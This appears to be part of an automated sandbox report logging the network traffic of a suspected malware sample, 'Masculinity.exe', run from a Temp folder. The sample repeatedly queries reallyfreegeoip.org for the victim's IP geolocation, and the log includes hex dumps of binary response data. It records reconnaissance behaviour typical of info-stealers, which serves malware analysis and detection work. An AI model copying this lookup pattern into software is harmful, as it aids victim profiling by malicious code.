                                            2024-07-25 08:05:10 UTC8000INData Raw: 8a e6 ce 2d dd 75 76 f9 25 34 ba 1b fb 81 f2 66 3e cb 9c a0 e7 d4 a0 ec 00 b9 0e e6 9f bd 67 5a d0 35 e6 b1 be 5d 86 56 22 db 2c 1b c7 28 36 9e 12 2c 38 b0 70 3e 88 ee fd f3 b4 5f 79 87 80 07 b7 a4 87 ed ca c8 80 88 d7 a4 bb 48 11 8e ab 54 1a b1 b5 85 18 ae c2 58 48 cd a2 22 6b 34 11 45 c8 3f 7a 8a 67 b8 48 30 eb ba 95 43 1f b1 54 39 e6 5c ee 53 cc 68 4c 03 95 89 7a a8 2b a0 d2 c4 71 04 af 30 20 a4 41 b5 03 31 a0 8b 5f bb 21 01 06 6f 61 4d fd c1 0e 3f 49 18 20 74 87 2b 4b 21 e3 25 18 3c c0 79 ed bc 87 99 bf 95 02 d5 24 bc 1c f8 42 5a e2 b9 df f2 36 ea c5 6d e3 e2 f5 e8 d6 78 e3 da 4c 94 0f de ce ac d2 13 c1 fc bb a5 75 90 d6 a6 f8 a2 31 5f 1a ba 5a e1 42 f2 99 3c b9 0c 42 cc 1c 8a f8 59 20 65 ea 8b a4 1b e9 cd fa 00 51 fa 5f 7d 38 a7 a9 af e1 5f 6e c3 2f
                                            Data Ascii: -uv%4f>gZ5]V",(6,8p>_yHTXH"k4E?zgH0CT9\ShLz+q0 A1_!oaM?I t+K!%<y$BZ6mxLu1_ZB<BY eQ_}8_n/
                                            2024-07-25 08:05:11 UTC8000INData Raw: 37 4f a2 e3 78 3f 07 f9 a7 50 4f 97 07 4d 45 3b a7 a9 6d 3a 71 1c 2f 6d 2a e9 75 21 63 9e 4b 3b de ce 44 6b b8 04 fc 2b 1f 8f ea 74 57 d3 a4 9c ee 9f e2 d0 e5 34 97 fc 12 33 59 a6 5c 4c d0 0c 95 e5 bc d8 71 94 91 45 5c dc 95 3a 42 84 b1 87 a6 e8 43 52 e9 f3 65 45 4b 64 3c dc 4b 68 8f 3e 24 46 49 70 17 c6 dc fb 71 5c cc a7 46 15 65 8c 43 0e 0f 76 80 de 75 1a 60 cd 73 32 4a 39 7c 06 f6 f1 37 d1 46 16 ea c4 b1 45 d2 83 c3 24 d5 2b 74 51 5c cd ca 6a f9 69 cb ea 16 15 28 bf 22 27 d1 56 a6 36 50 7d 39 4e 1c 4a e7 b9 47 95 11 24 c8 df 8c 25 57 49 04 a0 8e 3c 81 d7 06 5f 6e 0f 43 d7 a5 2f 4c d8 92 e5 82 3f 35 f3 db 2c 79 08 d4 c5 73 6a 6e a7 04 5b 54 51 80 2d 81 8c 1e 79 9a 8d 2f 33 21 92 24 2e f6 48 8c 51 b9 27 47 de 2d bd 5c 5a 38 71 ea fa b5 cc 9a bc d1 d8 17
                                            Data Ascii: 7Ox?POME;m:q/m*u!cK;Dk+tW43Y\LqE\:BCReEKd<Kh>$FIpq\FeCvu`s2J9|7FE$+tQ\ji("'V6P}9NJG$%WI<_nC/L?5,ysjn[TQ-y/3!$.HQ'G-\Z8q
                                            2024-07-25 08:05:11 UTC8000INData Raw: f9 72 18 ba 1b 80 80 da 62 2e cb 9a cf 5f d4 a0 e7 74 77 0a e6 10 b7 4f 5e e9 35 e0 cf 43 42 9a 74 5f 25 2c 11 bf 89 78 b2 6d 03 7c b9 5c 31 94 e5 fb f0 a6 5e 6e 86 8b 00 8e eb 86 ee d9 ca e2 a7 ca a9 8d 53 08 f8 45 5f 21 ea da b2 1e b1 cd 50 28 89 85 31 6f 2d 0b b1 8c 13 0b 88 6b 9f 4b 01 fb ab 99 4d 37 ed 14 34 e6 3d 85 65 ed 46 5f 25 cc 89 76 c5 17 a8 df 9f 1e 3c a9 2f 56 ee 5a b6 24 3b f9 a9 79 c9 b0 71 2f 1d 6e 4a 10 d2 12 2e 41 6b 69 52 86 5b 2e 7a 04 3a 1e 5f ee 2a fc b4 ff d5 44 1d 72 ba 0d be 6e 17 75 4d 93 b3 0b 9e 3f 89 2e 5a f1 90 ff 30 b3 73 80 2a 7f af 0d 2b 56 c1 a2 3c 32 f9 aa a6 71 cc d4 a5 4a a2 9f 5d 1a ba 26 ec 52 fe 87 c8 64 4a 4f df 12 1e c6 cc d4 65 ec 8b 6b 54 a3 b9 ce 00 5b e1 40 53 2c a2 ba ae e3 5e 42 df 2c a8 d5 5c fa a8 b4 ca
                                            Data Ascii: rb._twO^5CBt_%,xm|\1^nSE_!P(1o-kKM74=eF_%v</VZ$;yq/nJ.AkiR[.z:_*DrnuM?.Z0s*+V<2qJ]&RdJOekT[@S,^B,\
                                            2024-07-25 08:05:11 UTC8000INData Raw: f1 b6 5d 15 c0 4b 4d 33 47 82 ba 61 28 fd 79 72 60 4b ec 48 30 39 00 05 3b a4 b0 6b 06 e4 02 d4 7a 0e 83 c8 73 50 c2 a6 a7 fa 9d e2 d6 dd 29 86 dc ca 70 5f 84 57 4b bf 5a fa fe b7 f0 6d f9 8d 42 4f d0 bd 36 4b 09 f7 94 af f8 6f 50 65 be 45 4f 2a cc 0f 35 43 d9 a1 37 5d 99 79 58 93 64 f9 e8 71 5c 01 de 5c 67 6a ba 4a 56 b9 51 9b c9 63 bc 45 d1 01 0e 4d 39 24 50 d3 ec 2c d0 7f 09 99 dc f5 e7 87 f2 98 0b f2 2d 6b af 79 d2 c9 53 e9 c9 ee f3 0f 63 69 91 50 0d 72 7e a3 20 78 f6 2a 44 68 74 19 ba 52 80 69 56 80 df fc 39 ff e0 04 a0 80 3b 77 c3 8f 5d 63 6c 11 c7 a2 61 8d 0e ec 1a 82 35 fd 1d fd 5b 5e 04 c5 c3 4c 29 73 02 26 5b 54 5a 7b 3b f3 a5 46 79 ea 6e 16 24 28 30 01 36 84 46 c3 51 c9 e5 63 c7 3c ca ff 7f 22 13 d7 b5 b5 f9 38 99 cb d2 22 6a 4a eb 53 cd b7 95
                                            Data Ascii: ]KM3Ga(yr`KH09;kzsP)p_WKZmBO6KoPeEO*5C7]yXdq\\gjJVQcEM9$P,-kySciPr~ x*DhtRiV9;w]cla5[^L)s&[TZ{;Fyn$(06FQc<"8"jJS
                                            2024-07-25 08:05:11 UTC8000INData Raw: d9 3d 2f ce e8 95 1b d4 d0 f0 47 c6 0e e6 9f a0 b1 5d 8f 26 ec cf 4f 71 cb 41 c0 64 2c 1b cc 01 28 c0 e9 4d 35 c9 fe 1e 89 ec 5f fd a8 2d 73 c3 80 77 15 81 9e ff dd 6e b4 96 ba 94 c4 5f 70 28 90 61 30 9f 17 b1 00 c3 8a 51 20 96 00 1b 1a 2b 1c 61 8c 19 63 bc 63 a7 6f 11 f6 83 d8 5c 3f 95 94 35 e6 4d ee 4c ef 57 5e 3f 12 8b 79 a6 02 9f d9 d1 c8 eb 54 d0 50 fd 80 ae 10 1b bf b5 5f c3 d3 10 06 37 0c 4c 03 dd c4 3f 49 33 4f 35 9a 2b 41 53 06 3a 18 5f e8 22 ed c2 8c 93 62 8c 03 d5 24 ac 6e 11 5d 1f 92 b3 00 96 06 9d 28 d1 e2 92 ff 0c a0 78 80 21 4c 88 57 c6 11 c1 d8 66 41 9e aa d0 71 c9 d4 a5 4a 80 8c 59 32 aa 34 e0 49 f9 94 0f 0a 58 42 ce 19 41 fb e6 20 63 e0 89 08 b6 81 e5 be 6f 77 f2 4c 7d 1e a8 d5 8f f2 58 44 c8 f6 90 c6 4a c1 5b 8c f4 a8 33 6e 14 44 95 b0
                                            Data Ascii: =/G]&OqAd,(M5_-swn_p(a0Q +acco\?5MLW^?yTP_7L?I3O5+AS:_"b$n](x!LWfAqJY24IXBA cowL}XDJ[3nD


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549717188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-25 08:05:22 UTC706INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:22 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23445
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeGYV4P6Knzbu%2FwcLfCzNL7LAaJ3cqNzVQLbN1MinEh0mPS8w1XK2Yo2gRu%2FdEhlVaOsWX0XKpX7ErJmLcWIoZLKO0vT3uhYKXCMA1PqWHemdvhVOE9FQ4u0wPlkSaVFC6%2BhBU6Y"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa4feba9d7d06-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:05:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:05:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549718188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:24 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-25 08:05:24 UTC700INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:24 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23447
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5ULRQbfWxi3JsLkYYPFbgejSuCV5EIATQVzkuxwG7FFzROA5VJtKyXF50iAU0QrgbG6R4fj34KcGmLKr9t5ebr92OQSGjEN2W90STh7LoYq6pnDzh5hWyW3FcZcmGae5X8doUlk"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa50b8d7f1889-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:05:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:05:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.549721188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-25 08:05:33 UTC702INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:33 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23456
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xpp70vBpQcsZGuqv2vzrZVWs0IcT3QBwy5LKCxOEQ8y%2FwhimO61hTFgdvNWNGvMMXmu3hiyEJxmWRxBBqFWs7NjbucVWP2fGK3qjwD69phtQ1fvZEOLjVHDtJKq6n32WcOfFYOyh"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa5432ecc78db-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:05:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:05:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.549723188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:45 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-25 08:05:46 UTC710INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:46 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23469
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x2yddEvLKjp3lKp5c1NqZeou5DCY5STUA%2B2PZ%2FexIQPU2pH%2Fx8VADOz97s86WGq2sQymJpZfKSZbFBdPDc5PYBsLh04Ep2SgRgS%2Bm8OOr1v70RP5XkN6fi31wF5DMgVHONT1ev0%2B"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa592c8e043b0-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:05:46 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:05:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.549726188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:53 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-25 08:05:53 UTC702INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:53 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23476
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YvX5SgbIotcDiEw7ktm6fpKAeUtvs0EUk2NRYmmSDivMUf103itglLTqZqIDrsTIC0lQ8oy7tO4ITWCw9GhXvyklxw1jhkykTll4Y34rSKcilahmsafL8GU8I6KHa0%2F3bBTRfX94"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa5c28d884345-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:05:53 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:05:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.549728188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:57 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-25 08:05:57 UTC706INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:57 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23480
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ajw7z5jckGHtSedJ%2FuikxUg09iHNU%2FHgGdDCLm61tSwatZtxy3MJA2JdzvS39edRAykcYPaDei2KdPL0X5PzHnmlOU3eHuMJ9rbma0R8mwOYY7I2vM%2FIPDTxqMZrRAMlLUDy8QHc"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa5d948390c92-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:05:57 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:05:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.549730188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:59 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-25 08:05:59 UTC710INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:59 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23482
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKDBQdKQV62cjiLZ3HYNTmX3JGj7RfNhHntF9Sq6NE1FE%2B9iO%2BWJw6BsMQUzcBelJGN3ny98ZKeBCeERB%2BcDhnIG9OLHdnugBLQL9CATJ3rDeq5RdMIM%2FHnk%2B3U7bLCzMeFtMZAH"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa5e86f524356-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:05:59 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:05:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.549732188.114.97.3443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:06:01 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-25 08:06:02 UTC712INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:06:02 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 23485
                                            Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
